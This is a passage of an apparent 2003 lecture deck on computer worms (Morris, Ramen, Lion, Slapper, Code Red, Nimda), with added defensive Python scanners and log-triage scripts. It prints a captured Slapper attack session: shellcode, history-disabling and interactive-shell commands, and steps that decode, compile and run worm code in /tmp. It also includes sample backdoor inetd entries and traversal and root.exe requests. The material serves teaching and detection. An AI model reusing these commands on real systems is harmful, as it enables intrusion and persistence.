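        and all(b in EICAR_TRAILER for b in data[68:])
    )


def scan_bytes(data: bytes, signatures=SIGNATURES) -> list:
    """Generic signature scan: every (name, offset) at which a known pattern occurs."""
    hits = []
    for name, pattern in signatures.items():
        start = 0
        while (idx := data.find(pattern, start)) != -1:
            hits.append((name, idx))
            start = idx + 1
    return sorted(hits, key=lambda h: h[1])


def scan_file(path: str) -> dict:
    """Scan one file; report signature hits and whether it is a valid EICAR test file."""
    with open(path, "rb") as f:
        data = f.read()
    return {"hits": scan_bytes(data), "eicar_test_file": is_eicar_test_file(data)}


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(path, scan_file(path))
```

The distinction the two functions draw is deliberate: a scanner must flag the pattern wherever it occurs (a dropper that carries the test string inside a larger binary is still worth a look), but only a file that meets the EICAR rules is the harmless test file that vendors agree to detect.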

Anti-Virus Technologies – Packages

• Norton AntiVirus
  – Corporate edition includes many remote administration features
• Dr. Solomon's
• McAfee
• Sophos
• Many, many others

Worms

Okay, So Then What's a Worm?

• Similar to a virus, but propagates itself through the Internet by breaking into machines
• Main goal is usually to bring down and deny access to networks and services
• Does not rely on user intervention
• Does not rely on being transmitted physically (i.e. by disk)
• Does not rely on being emailed or transferred by the user; it does it by itself

Why Worms?

• Ease
  – Write and launch once
  – Many acquisitions
  – Continually working
• Pervasiveness
  – Weeds out the weakest targets
  – Penetrates difficult networks

Worms

• A worm is a self-propagating piece of malicious software. It attacks vulnerable hosts, infects them, then uses them to attack other vulnerable hosts
• "Famous" worms
  – Morris Internet worm (1988)
  – Currently:
    • Ramen worm
    • Lion worm
    • Adore worm
    • Code Red
    • Nimda

Worms

• Who writes them
  – Hackers/crackers
  – Researchers
  – Virus writers

Worms

• Worms vs. viruses
  – Viruses require interaction
  – Worms act on their own
  – Viruses use social attacks
  – Worms use technical attacks

Worms at a Glance

• Main goal is to disrupt the network and deny access
• Many shut down anti-virus and firewall applications
• Not concerned about detection
• 1988: shut down 3,000-6,000 computers (5-10% of the Internet)
• Growing trend of worms making the headlines rather than true viruses
  – Code Red
  – Nimda
  – Opaserv

The Worm's Beginnings

• John Shoch (with Jon Hupp) invented the concept at Xerox's Palo Alto research labs in 1978
• Designed as a useful tool that borrowed clock cycles from idle CPUs
• Actually got out of control back then as well

Morris Internet Worm

On November 2, 1988, Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating, self-propagating program called a worm and injected it into the Internet (the 99-line C "grappling hook" it first planted on each new host pulled the rest of the worm over the network). He chose to release it from MIT to disguise the fact that the worm came from Cornell. Morris soon discovered that the program was replicating and infecting machines at a much faster rate than he had anticipated: there was a bug. Ultimately, many machines at locations around the country either crashed or became "catatonic." When Morris realized what was happening, he contacted a friend at Harvard to discuss a solution. Eventually, they sent an anonymous message from Harvard over the network, instructing programmers how to kill the worm and prevent re-infection. The estimated cost of dealing with the worm at each installation ranged from $200 to more than $53,000.

How it Didn't Bring 6,000 Machines Down

• The worm didn't alter or destroy files
• The worm didn't save or transmit the passwords which it cracked
• The worm didn't make special attempts to gain root or superuser access in a system (and didn't utilize the privileges if it managed to get them)
• The worm didn't place copies of itself or other programs into memory to be executed at a later time (such programs are commonly referred to as time bombs)
• The worm didn't attack machines other than Sun 3 systems and VAX computers running 4 BSD Unix (or equivalent)
• The worm didn't attack machines that weren't attached to the Internet
• The worm didn't travel from machine to machine via disk
• The worm didn't cause physical damage to computer systems

How it Did Take 10% of the Net Down

• Utilized a variety of Unix security holes
  – Sendmail remote debug
    • Allowed the worm to execute remote commands on the system
  – fingerd buffer overflow (gets() into a 512-byte buffer) on VAX targets
  – Trust relationships: rsh/rexec to hosts listed in .rhosts and /etc/hosts.equiv
  – Obtained user lists
    • Ran a dictionary attack of 432 "common" passwords against the user lists, along with permutations of each account name and words from /usr/dict/words
• Most passwords today are as insecure as in 1988

How the First Worm Changed System Administration

• File access should be limited (the worm could open the encrypted password file)
• Networks should use a conglomerate of OSes
  – e.g. a UNIX worm won't infect a Win2k server
• Brought about forums for sharing research (the CERT Coordination Center was created in direct response)
• Beware of reflexes! Many S.A.'s shut down sendmail to stop the worm, but that only delayed the information on how to patch and fix it
• Logs are monotonous but are extremely useful in troubleshooting

Internet Worms

• First worms were actually designed and released in the 1980's
• Worms were non-destructive and generally were released to perform helpful network tasks
  – Vampire worm: idle during the day; at night it would use spare CPU cycles to perform complex tasks that required the extra computing power

Internet Worms

• Eventually negative aspects of worms came to light
  – An internal Xerox worm crashed all the computers in a particular research center
  – When the machines were restarted the worm re-propagated and crashed them again

Six Components of Worms

• Reconnaissance
• Specific Attacks
• Command Interface
• Communication Mechanisms
• Intelligence Capabilities
• Unused and Non-attack Capabilities

Reconnaissance

• Target identification
• Active methods
  – Scanning
• Passive methods
  – OS fingerprinting
  – Traffic analysis

Specific Attacks

• Exploits
  – Buffer overflows, cgi-bin, etc.
  – Trojan horse injections
• Limited in targets
• Two components
  – Local, remote

Command Interface

• Interface to the compromised system
  – Administrative shell
  – Network client
• Accepts instructions
  – From a person
  – From another worm node

Communications

• Information transfer
• Protocols
• Stealth concerns

Intelligence Database

• Knowledge of other nodes
• Concrete vs. abstract
• Complete vs. incomplete

UNIX Worms

• Ramen Worm (01/2001)
• Lion Worm (02/2001)
• Adore Worm (04/2001)
• Cheese Worm (05/2001)
• Sadmind Worm (05/2001)
• Scalper Worm (07/2002)
• Slapper Worm (09/2002)

Ramen Worm

• First discovered in January of 2001
• Attacks Red Hat Linux 6.2 and 7.0 systems
• The worm randomly selects a class B (/16) network and attempts to use well-known exploits against rpc.statd, wu-ftpd and LPRng to gain access

Ramen Worm: Detection

• If you're running a web server, the worm replaces your index.html with its own defacement page (shown as an image on the original slide, not reproduced here)
• Starts an HTTP daemon on TCP port 27374 from which newly infected hosts download the worm code

Ramen Worm: Added Feature

• Note: the worm patches the holes it used to gain access so no other system cracker can get in. (Isn't that nice of them!)

Lion Worm

• Exploits a weakness in BIND (the TSIG buffer overflow, CVE-2001-0010) to gain root access
• Listens on port 27374
• Sends out email to [email protected] with /etc/passwd, /etc/shadow and network settings
• Randomly generates class B network addresses to scan
• Scans the network for exploitable hosts

Lion Worm

• Once it exploits a host, it installs the t0rn root kit
• Ports 60008/tcp and 33567/tcp get bound to a backdoor root shell
• A trojaned version of SSH gets bound to 33568/tcp

Adore Worm

• First appeared around April 1, 2001
• Similar to Ramen and Lion
• Exploits BIND, rpc.statd and LPRng on Red Hat Linux systems
• Emails information, including /etc/passwd, to a few different email addresses

Cheese Worm

• The 'cheese worm' is a worm designed to remove all inetd services referencing '/bin/sh' from systems with root shells listening on TCP port 10008, a signature of the li0n worm. Although this can be seen as a self-spreading patch, in reality the 'cheese worm' will attempt to execute a series of shell commands on any host which accepts connections on TCP port 10008.
• The 'cheese worm' perpetuates its attack cycle across multiple hosts by copying itself from attacking host to victim host and self-initiating another attack cycle. Thus, no human intervention is required to perpetuate the cycle once the worm has begun to propagate.

sadmind/IIS Worm

• The worm uses two well-known vulnerabilities to compromise systems and deface web pages.
• Sadmind/IIS propagates using a buffer overrun exploit against the sadmind program on Solaris systems, part of the Solstice AdminSuite.
• After successfully compromising the Solaris systems, it uses the "Web Server Folder Directory Traversal" vulnerability (MS00-078) to compromise IIS systems.
• When the worm attacks a system it appends the text "+ +" to root's .rhosts file, which makes every user on every host a trusted rsh/rlogin user. It then copies the worm to the new machine and extracts it into a new /dev/cuc directory. /etc/rc.d/S71rpc is changed so the worm is started when the system boots, and that file is then run to make the worm active immediately.
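The host indicators the Lion, Cheese and sadmind/IIS slides above describe (worm ports bound on the box, inetd entries that hand a socket straight to /bin/sh, a '+' wildcard in root's .rhosts) turned into a triage script, as an added example that is not code from the original slides or from any incident report. The three sample inputs are constructed to look like netstat -an output, an inetd.conf and a .rhosts file; the port-to-worm table is taken from the slides.

```python
# Ports the slides attribute to the UNIX worms discussed in this section.
WORM_PORTS = {
    27374: "Ramen/Lion HTTP download daemon",
    60008: "Lion (t0rn) backdoor root shell",
    33567: "Lion (t0rn) backdoor root shell",
    33568: "Lion trojaned SSH",
    10008: "li0n inetd root shell (Cheese worm target)",
}


def listening_ports(netstat_output: str) -> set:
    """Ports bound locally, from 'netstat -an' style lines: TCP sockets in LISTEN
    and every UDP socket. The header and established connections are skipped."""
    ports = set()
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].startswith(("tcp", "udp")):
            continue
        if fields[0].startswith("tcp") and (len(fields) < 6 or fields[5] != "LISTEN"):
            continue
        port = fields[3].rsplit(":", 1)[-1]   # rsplit copes with IPv6 addresses too
        if port.isdigit():
            ports.add(int(port))
    return ports


def inetd_shell_services(inetd_conf: str) -> list:
    """(service, entry) for inetd.conf lines whose server program or arguments
    are a shell. Format: service socket proto wait user server [args...]."""
    hits = []
    for raw in inetd_conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        fields = line.split()
        if len(fields) < 6:
            continue
        if any(f.endswith(("/sh", "/bash")) for f in fields[5:]):
            hits.append((fields[0], line))
    return hits


def rhosts_wildcard(rhosts_text: str) -> bool:
    """True if a '+' stands in the host field: '+' trusts every host for the same
    user name, '+ +' (what sadmind/IIS writes) trusts every user on every host."""
    for raw in rhosts_text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if fields and fields[0] == "+":
            return True
    return False


def triage(netstat_output: str, inetd_conf: str, rhosts_text: str) -> list:
    findings = []
    for port in sorted(listening_ports(netstat_output) & set(WORM_PORTS)):
        findings.append(f"port {port}/tcp listening: {WORM_PORTS[port]}")
    for service, line in inetd_shell_services(inetd_conf):
        findings.append(f"inetd hands {service!r} to a shell: {line}")
    if rhosts_wildcard(rhosts_text):
        findings.append("root .rhosts contains a '+' wildcard (sadmind/IIS writes '+ +')")
    return findings


# Constructed sample input, not captured from a real host.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:27374           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:10008           0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:51022          ESTABLISHED
udp        0      0 0.0.0.0:68              0.0.0.0:*
"""
SAMPLE_INETD = """\
# /etc/inetd.conf (constructed)
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
10008   stream  tcp     nowait  root    /bin/sh sh -i
"""
SAMPLE_RHOSTS = "+ +\n"

if __name__ == "__main__":
    for finding in triage(SAMPLE_NETSTAT, SAMPLE_INETD, SAMPLE_RHOSTS):
        print(finding)
```

The script reads text rather than querying the system so it can be run against output collected from a suspect host (netstat and the two files copied off before any cleanup) on a machine you trust; a rootkit like t0rn replaces the local netstat precisely so that it will not show these ports.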

Scalper Worm

• This worm spreads over Apache web servers on FreeBSD by using the chunked-encoding exploit (CVE-2002-0392)
• It first sends an ordinary request to the server. If the reply says the server is Apache, it sends the exploit whether or not the target is actually vulnerable. The worm gives an attacker remote control of the host, including DDoS capability
• Each worm installation keeps in memory a list of all the IPs infected from it, so that all infected servers are connected in a tree-like fashion

Slapper Worm

• Slapper is an improved version of the Linux/FreeBSD Scalper worm. It uses the OpenSSL SSLv2 handshake overflow (CVE-2002-0656) disclosed at the end of July 2002, reached through Apache's mod_ssl
• The Slapper worm scans for vulnerable systems on 80/tcp using an invalid HTTP GET request; the Server: banner on the error page tells it whether the host runs Apache with mod_ssl, and the exploit itself then goes to 443/tcp. Once infected, the victim server begins scanning for additional hosts to continue the worm's propagation
• Additionally, the Slapper worm can act as an attack platform for distributed denial of service (DDoS)
  – UDP, TCP and IPv6 floods
• Potentially destructive (corrupts data while replicating)
• Slapper took a big evolutionary step by creating a peer-to-peer network among the infected hosts
• Considered a hint of what future cyberweapons may look like

Slapper Get Request

68.168.1.15:52160 -> 127.0.0.1:80
GET / HTTP/1.1....

127.0.0.1:80 -> 68.168.1.15:52160
HTTP/1.1 400 Bad Request..Date: Sun, 22 Sep 2002 03:41:10 GMT..Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.0.6 mod_perl/1.24_01..Connection: close..Transfer-Encoding: chunked..Content-Type: text/html; charset=iso-8859-1....169..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML><HEAD>.<TITLE>400 Bad Request</TITLE>.</HEAD><BODY>.<H1>Bad Request</H1>.Your browser sent a request that this server could not understand.<P>.client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): <P>.<HR>.<ADDRESS>Apache/1.3.20 Server at 127.0.0.1 Port 80</ADDRESS>.</BODY></HTML>...0....

The request is deliberately malformed (HTTP/1.1 with no Host header), but the 400 error page still carries the Server: banner with the Apache, mod_ssl and OpenSSL versions, which is all the worm needs to decide whether to fire the exploit at port 443.

The Attack

...........N..zCyhy...i..B...y...c....t...D.1..9P`.8../9...-.....

.........hjE.H.o.,B...."Oo...:.....'...i..%._~-...Z...RqAJX...p3.....p5o.j.../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA..G@AAAA............AAAAAAAA....................................1....w..w..O.O.....1.....Q1..f......Y1.9.u.f..Xf9F.t.....1...1..?I..A..1...Q[....1.Ph//shh/bin..PS.......

[..]

68.168.1.15:52312 -> 127.0.0.1:443export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null; export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.

68.168.1.15:52312 -> 127.0.0.1:443

Compiling and Installing

68.168.1.15:52312 -> 127.0.0.1:443
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp/update /tmp/.unlock; cat > /tmp/.unlock.uu << __eof__; begin 655 .unlock [worm source code, in uuencoded format, omitted]

68.168.1.15:52312 -> 127.0.0.1:443
uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock -C /tmp/; gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; gcc -o /tmp/update /tmp/.update.c; ./tmp/httpd 68.168.1.15; /tmp/update;

68.168.1.15:52312 -> 127.0.0.1:443
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp/update; exit;

Everything happens in /tmp through the shell obtained above: the source arrives uuencoded over the same connection, is compiled with the victim's own gcc against libcrypto (so a host without a compiler or OpenSSL development files is a poor victim), the attacker's address is passed to the new node so it can join the peer network, and the last command removes the source and binaries before the session ends.

SECURITY INNOVATION ©2003

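A detection pass over a captured session like the one above, added here as an example (it is not code from the deck or from any worm analysis). It groups the capture by flow, splits each line into simple commands and flags the post-exploitation habits the slides show: history disabled, an interactive shell handed the connection, an encoded file dropped, compiled and run from /tmp, then cleaned up, plus the fact that shell commands are readable at all on TCP 443. The "src:port -> dst:port command" layout, the SESSION sample (built from the slide's commands plus one benign control line) and the indicator list are this example's own assumptions.

```python
import re
from collections import OrderedDict

# Constructed sample in the "src:port -> dst:port command" layout of the slides.
# Lines 1-4 are the commands the capture shows (uuencoded source omitted, as on
# the slide); line 5 is a benign control command that is not in the deck.
SESSION = [
    "68.168.1.15:52312 -> 127.0.0.1:443 export TERM=xterm;export HOME=/tmp;"
    "export HISTFILE=/dev/null; export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i",
    "68.168.1.15:52312 -> 127.0.0.1:443 rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
    "/tmp/httpd /tmp/update /tmp/.unlock; cat > /tmp/.unlock.uu << __eof__; begin 655 .unlock",
    "68.168.1.15:52312 -> 127.0.0.1:443 uudecode -o /tmp/.unlock /tmp/.unlock.uu; "
    "tar xzf /tmp/.unlock -C /tmp/;gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; "
    "gcc -o /tmp/update /tmp/.update.c;/tmp/httpd 68.168.1.15; /tmp/update",
    "68.168.1.15:52312 -> 127.0.0.1:443 rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
    "/tmp/httpd /tmp/update; exit",
    "192.0.2.5:40122 -> 127.0.0.1:443 ls -l /var/www",
]

FLOW_RE = re.compile(r"^(?P<src>[\d.]+:\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)\s*(?P<cmd>.*)$")
SHELLS = {"sh", "bash", "dash", "ksh", "zsh"}
TLS_PORTS = {443}  # ports where commands should never be readable on the wire


def split_commands(cmdline):
    """Split a shell line into simple commands on ';', '&&', '||' and '|'."""
    return [c.strip() for c in re.split(r";|&&|\|\||\|", cmdline) if c.strip()]


def classify_command(cmd):
    """Return the post-exploitation indicators one simple command matches."""
    findings = []
    words = cmd.split()
    if not words:
        return findings
    if "HISTFILE=/dev/null" in cmd:
        findings.append("shell history disabled (HISTFILE=/dev/null)")
    if words[0] == "exec" and len(words) > 2 and words[1].rsplit("/", 1)[-1] in SHELLS and "-i" in words:
        findings.append("interactive shell attached to the connection")
    if words[0] in ("uudecode", "base64") or re.search(r"cat\s*>\s*/tmp/\S+\s*<<", cmd):
        findings.append("encoded payload written or decoded under /tmp")
    if words[0] in ("gcc", "cc") and "-o" in words:
        i = words.index("-o")
        if i + 1 < len(words) and words[i + 1].startswith("/tmp/"):
            findings.append("compiler output placed in /tmp")
    if words[0].startswith("/tmp/"):
        findings.append("binary executed from /tmp")
    if words[0] == "rm" and any(w.startswith("/tmp/") for w in words[1:]):
        findings.append("artifacts removed from /tmp")
    return findings


def analyze_session(lines):
    """Group capture lines by flow; return {flow: [unique findings]} for flows
    that show at least one indicator."""
    report = OrderedDict()
    for line in lines:
        m = FLOW_RE.match(line)
        if not m:
            continue
        flow = "%s -> %s:%s" % (m["src"], m["dst"], m["dport"])
        found = report.setdefault(flow, [])
        for cmd in split_commands(m["cmd"]):
            for f in classify_command(cmd):
                if f not in found:
                    found.append(f)
        if found and int(m["dport"]) in TLS_PORTS:
            note = "plaintext shell commands on TCP port %s" % m["dport"]
            if note not in found:
                found.append(note)
    return OrderedDict((k, v) for k, v in report.items() if v)


if __name__ == "__main__":
    for flow, findings in analyze_session(SESSION).items():
        print(flow)
        for f in findings:
            print("  -", f)
```

Each indicator on its own is weak (administrators compile things in /tmp too); the point of grouping by flow is that the attacker's session trips all of them in sequence, while the control flow trips none.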
Remote Communications

obs:  XXXX XXXX == localhost IP
      YYYY YYYY == worm_host IP
      0x70      == incoming client flag

127.0.0.1.4156 > 68.168.1.15.4156: udp 28 (DF)

0x0000  4500 0038 0000 4000 4011 beb3 XXXX XXXX   E..8..@.@.......
0x0010  YYYY YYYY 103c 103c 0024 92cb 0000 0000   ...'.<.<.$......
0x0020  8fff 0000 25b8 aaa8 7000 0000 0000 0000   ....%...p.......
                            ^^

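A parser for this dump, added here as an example (not code from the deck). It rebuilds the packet bytes from tcpdump -X lines, decodes the IPv4 and UDP headers, cross-checks the length fields against the 56-byte total and the "udp 28" payload, and reads the byte the slide marks with "^^". The sample dump is constructed: the addresses the slide masks as XXXX/YYYY are replaced by 127.0.0.1 and 192.0.2.15, and the final 8 payload bytes the slide does not show are zero-padded; the payload offset of the flag and its meaning are taken from the slide's annotation.

```python
import re
import struct

# Constructed sample in the tcpdump -X layout of the slide. Addresses are
# 127.0.0.1 and 192.0.2.15 (RFC 5737 documentation range) in place of the
# masked XXXX/YYYY; the slide shows only the first 48 of the 56 bytes, so the
# last 8 payload bytes are padded with zeros here.
SAMPLE_DUMP = """\
0x0000  4500 0038 0000 4000 4011 beb3 7f00 0001   E..8..@.@.......
0x0010  c000 020f 103c 103c 0024 92cb 0000 0000   .....<.<.$......
0x0020  8fff 0000 25b8 aaa8 7000 0000 0000 0000   ....%...p.......
0x0030  0000 0000 0000 0000                       ........
"""

FLAG_OFFSET = 12             # the byte marked "^^": 12 bytes into the UDP payload
INCOMING_CLIENT_FLAG = 0x70  # value the slide annotates as "incoming client flag"


def hexdump_to_bytes(dump):
    """Rebuild raw packet bytes from tcpdump -X lines ('0xNNNN  hhhh ...   ascii')."""
    out = bytearray()
    for line in dump.splitlines():
        if not line.startswith("0x"):
            continue
        # offset, hex words and ASCII column are separated by runs of 2+ spaces
        parts = re.split(r"\s{2,}", line.strip())
        if len(parts) < 2:
            continue
        out += bytes.fromhex(parts[1].replace(" ", ""))
    return bytes(out)


def parse_ipv4_udp(pkt):
    """Decode the IPv4 and UDP headers, cross-check the length fields, and
    return the fields the slide annotates plus the UDP payload."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, total_len, _ident, flags_frag, ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20:
        raise ValueError("not an IPv4 header")
    if proto != 17:
        raise ValueError("not UDP (protocol %d)" % proto)
    if total_len != len(pkt):
        raise ValueError("IP total length %d, but %d bytes captured" % (total_len, len(pkt)))
    sport, dport, ulen, _ucsum = struct.unpack("!HHHH", pkt[ihl:ihl + 8])
    if ulen != total_len - ihl:
        raise ValueError("UDP length %d inconsistent with IP length" % ulen)
    return {
        "src": ".".join(str(b) for b in src),
        "dst": ".".join(str(b) for b in dst),
        "ttl": ttl,
        "df": bool(flags_frag & 0x4000),
        "sport": sport,
        "dport": dport,
        "payload": pkt[ihl + 8:ihl + ulen],
    }


def classify(pkt):
    """Parse one datagram and report whether its flag byte marks an incoming client."""
    info = parse_ipv4_udp(pkt)
    payload = info["payload"]
    info["flag"] = payload[FLAG_OFFSET] if len(payload) > FLAG_OFFSET else None
    info["incoming_client"] = info["flag"] == INCOMING_CLIENT_FLAG
    return info


if __name__ == "__main__":
    info = classify(hexdump_to_bytes(SAMPLE_DUMP))
    print("%s:%d -> %s:%d flag=0x%02x incoming_client=%s"
          % (info["src"], info["sport"], info["dst"], info["dport"], info["flag"], info["incoming_client"]))
```

The length checks matter for this kind of triage: the dump on the slide is itself 8 bytes short of its own IP total length, and a parser that trusts the capture without checking would read the flag from the wrong place on a truncated packet.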
Worm Propagation

• Central Source Propagation
  – This type of propagation involves a central location: after a computer is infected, it locates a source from which it can fetch code to copy onto the compromised computer; once the current computer is infected, it finds the next computer and the cycle starts over. An example of this kind of worm is the 1i0n worm.

Worm Propagation

• Back-Chaining Propagation
  – The Cheese worm is an example of this type of propagation, where the attacking computer initiates a file transfer to the victim computer. After initiation, the attacking computer can send files and any payload over to the victim without intervention. The victim then becomes the attacking computer in the next cycle, with a new victim. This method of propagation is more reliable than central source propagation, because the central source can be cut off.

Worm Propagation

• Autonomous Propagation
  – Autonomous worms attack the victim computer and insert the attack instructions directly into the processing space of the victim computer, so the next attack cycle starts without any additional file transfer. Code Red is an example of this type of worm. The original Morris worm of 1988 was of this nature as well.

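A toy simulation of the first two models, written for this page (not from the deck) to show the point the slides make: a central-source worm stops spreading the moment its code repository is taken offline, while a back-chaining worm (and, in this model, an autonomous one, which merely skips the file transfer) keeps going. The host count, probe rate, cutoff step and seed are this example's own constructed parameters; it is not a measurement of any real worm.

```python
import random


def simulate(model, hosts=200, steps=80, source_cutoff=5, seed=7):
    """Simulate one outbreak and return the infected count after each step.

    model == "central": a host that finds a victim must fetch the worm code
    from the central source; after step `source_cutoff` the source is gone
    and no new victim can be infected.
    model == "chain": the infecting host delivers the code itself (back-
    chaining; autonomous propagation behaves the same here), so nothing
    depends on the source.

    Every infected host probes one random address per step and every host
    is assumed vulnerable. Constructed model for this example only.
    """
    rng = random.Random(seed)
    infected = {0}            # host 0 is the initial victim
    source_up = True
    history = []
    for step in range(1, steps + 1):
        if model == "central" and step > source_cutoff:
            source_up = False  # defenders take the code repository offline
        new = set()
        for _host in list(infected):
            victim = rng.randrange(hosts)
            if victim in infected or victim in new:
                continue
            # the victim is infected only if the worm code can be delivered
            if model == "chain" or source_up:
                new.add(victim)
        infected |= new
        history.append(len(infected))
    return history


def compare(hosts=200, steps=80, source_cutoff=5, seed=7):
    """Run both models with the same parameters and summarize the outcome."""
    central = simulate("central", hosts, steps, source_cutoff, seed)
    chain = simulate("chain", hosts, steps, source_cutoff, seed)
    return {
        "central_at_cutoff": central[source_cutoff - 1],
        "central_final": central[-1],
        "chain_final": chain[-1],
        "central_halted": central[-1] == central[source_cutoff - 1],
        "chain_saturated": chain[-1] == hosts,
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print("%-18s %s" % (key, value))
```

The defensive reading is the one the slide gives: cutting off a central source is an effective response only against the first model, so the propagation style of a worm decides whether a takedown or only host-level remediation will stop it.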
Windows Worms

• Code Red
• Nimda

Windows Worms

• Code Red infected over 250,000 systems in 9 hours on July 19, 2001.
• The NIMDA and Code Red worms cost business 3 - 4 billion dollars.

W32/Bady.worm (Code Red): Infection

• Exploits the buffer overflow vulnerability associated with "idq.dll". idq.dll provides support for Internet data administrative script files (".ida") and Internet data query files (".idq") for Indexing Server 2.0 and Indexing Services.
• The malicious code is not saved as a file, but is inserted into and then run directly from memory.
• Static worm

W32/Bady.worm (Code Red): Propagation

• If the file C:\Notworm does not exist, new threads are created. If the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses.
• The worm sends its code as an HTTP request. The HTTP request exploits a known buffer-overflow vulnerability, which allows the worm to run on your computer.
• Uses an in-memory copy

W32/Bady.worm (Code Red): Payload

• Denial of Service by sending large amounts of junk data to port 80 (Web service) of 198.137.240.91, which was www.whitehouse.gov. This IP address has since been changed and is no longer active.
• If the default language of the computer is U.S. English, further threads cause Web pages to appear defaced. First, the thread sleeps two hours and then hooks the function that responds to HTTP requests. Instead of returning the correct Web page, the worm returns its own HTML code.

W32/Bady.worm (Code Red)

Code Red II: Infection

• Exploits a security vulnerability in idq.dll, which contains an unchecked buffer in a section of code that handles input URLs. Idq.dll runs in the System context, so exploiting the vulnerability gives the attacker complete control of the server.
• The worm first calls its initialization routine, which identifies the base address of Kernel32.dll in the process address space of the IIS Server service.
• It then loads WS2_32.dll to access functions such as socket, closesocket and WSAGetLastError. From User32.dll it gets ExitWindowsEx, which the worm uses to reboot the system.
• The main thread checks for two different markers. The first marker, "29A", controls the installation of Trojan.VirtualRoot. The other marker is a semaphore named "CodeRedII". If the semaphore exists, the worm goes into an infinite sleep.

Code Red II: Propagation

• If the default language is Chinese (either Taiwan or PRC), it creates 600 new threads; otherwise, it creates 300. These threads generate random IP addresses which are used to search for new Web servers to infect.
• The random addresses are not uniformly distributed: the generator favors topologically closer hosts.

Code Red II: Payload

• If the Trojan dropped by the worm has modified the registry key
  HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots
  (by adding a few new keys and setting the user group to 217), it allows a hacker to take full control of the Web server by sending an HTTP GET request to run scripts/root.exe on the infected Web server.
• The Trojan (C:\Explorer.exe) sleeps for a few minutes and then resets these keys, to make sure the registry keys stay modified.
• Copies Cmd.exe from the Windows NT \System folder to the following folders (if they exist):
  – C:\Inetpub\Scripts\Root.exe
  – D:\Inetpub\Scripts\Root.exe
  – C:\Progra~1\Common~1\System\MSADC\Root.exe
  – D:\Progra~1\Common~1\System\MSADC\Root.exe

W32/Nimda@mm: Infection

• The worm uses the Unicode Web Traversal exploit.
• The worm is started as ADMIN.DLL on infected web servers. It then starts to scan and infect files on all available drives, including removable and network ones. The EXE files (except WINZIP32.EXE) on these drives get infected with the worm.
• The infection technique is unique: the worm puts the infected file inside its body as a resource. When the infected file is run, the worm extracts the embedded original EXE file, runs it and tries to delete it afterwards. If immediate deletion is not possible, the worm creates a WININIT.INI file that deletes the extracted file on the next Windows startup.

W32/Nimda@mm: Propagation

• The worm searches through all the '.htm' and '.html' files in the Temporary Internet Files folder for e-mail addresses. It also reads through the user's inbox and collects the sender addresses. When the address list is ready, it uses its own SMTP engine to send the infected messages.
• The worm uses backdoors on IIS servers, such as the one Code Red II installs. It scans random IP addresses for these backdoors. When a host is found to have one, the worm instructs that machine to download the worm code (Admin.dll) from the host used for scanning, then executes the worm on the target machine, infecting it.

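A web-log triage pass that covers the three IIS-side behaviours described on the Code Red, Code Red II and Nimda slides, added here as an example (not code from the deck or from any vendor write-up): an oversized query to an .ida/.idq handler (the idq.dll overflow Code Red rides in on), a request for the root.exe copy of cmd.exe that Code Red II leaves behind, and an encoded path that climbs out of the web root (the Unicode traversal Nimda uses). The decoder maps overlong UTF-8 forms back to the ASCII they encode and repeats once for double-encoded input, which goes a step beyond what the slides state. The log layout, the sample lines, the query-length threshold and the RFC 5737 client addresses are this example's own assumptions.

```python
import re

# Constructed sample lines in combined-log layout (clients from RFC 5737 space).
# Line 2 carries padding of the size an idq.dll overflow attempt needs (built
# here, not copied from any worm); line 3 asks for the Code Red II root.exe
# backdoor; lines 4 and 5 use overlong-UTF-8 and double-encoded traversal.
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Jul/2001:10:03:17 -0400] "GET /index.html HTTP/1.0" 200 1042',
    '198.51.100.8 - - [19/Jul/2001:10:03:18 -0400] "GET /default.ida?' + "N" * 300 + ' HTTP/1.0" 200 0',
    '198.51.100.9 - - [04/Aug/2001:02:11:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 0',
    '198.51.100.10 - - [18/Sep/2001:13:41:02 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 0',
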